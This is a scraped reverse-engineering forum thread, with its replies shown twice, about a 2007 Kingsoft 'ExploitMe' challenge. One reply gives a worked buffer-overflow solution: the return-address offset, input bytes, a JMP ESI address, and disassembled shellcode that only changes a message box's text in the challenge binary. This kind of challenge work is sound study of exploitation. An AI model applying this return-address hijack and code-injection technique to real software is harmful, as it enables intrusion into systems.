ExploitMe-1)珠海金山2007逆向分析挑战赛-看雪-安全社区|安全招聘|kanxue.com

最新回复 (3)
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 2 楼验证通过~~ 2007-8-28 16:13 0
DarkNess0ut 雪币： 367 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 212 粉丝 2 关注私信	DarkNess0ut 3 楼 RET 地址和加载的代码偏移0x30字节,由(0x30+4)/4=0xD test.txt前8字节取F7 97 95 09 00 00 00 00 计算得到CX=0x0D 0xd*4-4偏移处即函数返回地址选4002B8 Jmp ESI ESI即申请的内存空间 ESI=0x1030000 01030000 /EB 7C JMP SHORT 0103007E 01030002 \|8980 1C1C1C1C MOV DWORD PTR DS:[EAX+1C1C1C1C], EAX 01030008 \|8D6C24 20 LEA EBP, DWORD PTR SS:[ESP+20] 0103000C \|C705 68024000 4>MOV DWORD PTR DS:[ExploitM.Caption], 214B4F 01030016 \|C705 60024000 4>MOV DWORD PTR DS:[ExploitM.Text], 214B4F 01030020 \|59 POP ECX ; 01030000 01030021 \|59 POP ECX ; 01030000 01030022 \|68 83034000 PUSH 400383 01030027 \|C3 RETN . . .0103007E jmp 01030008 2007-8-28 16:31 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 4 楼 100.07052951388888888888888888889 2007-9-2 21:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (3)
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 2 楼验证通过~~ 2007-8-28 16:13 0
DarkNess0ut 雪币： 367 活跃值： (42) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 212 粉丝 2 关注私信	DarkNess0ut 3 楼 RET 地址和加载的代码偏移0x30字节,由(0x30+4)/4=0xD test.txt前8字节取F7 97 95 09 00 00 00 00 计算得到CX=0x0D 0xd*4-4偏移处即函数返回地址选4002B8 Jmp ESI ESI即申请的内存空间 ESI=0x1030000 01030000 /EB 7C JMP SHORT 0103007E 01030002 \|8980 1C1C1C1C MOV DWORD PTR DS:[EAX+1C1C1C1C], EAX 01030008 \|8D6C24 20 LEA EBP, DWORD PTR SS:[ESP+20] 0103000C \|C705 68024000 4>MOV DWORD PTR DS:[ExploitM.Caption], 214B4F 01030016 \|C705 60024000 4>MOV DWORD PTR DS:[ExploitM.Text], 214B4F 01030020 \|59 POP ECX ; 01030000 01030021 \|59 POP ECX ; 01030000 01030022 \|68 83034000 PUSH 400383 01030027 \|C3 RETN . . .0103007E jmp 01030008 2007-8-28 16:31 0
笨笨雄雪币： 846 活跃值： (221) 能力值： (RANK：570 ) 在线值：发帖 212 回帖 3620 粉丝 23 关注私信	笨笨雄 14 4 楼 100.07052951388888888888888888889 2007-9-2 21:35 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复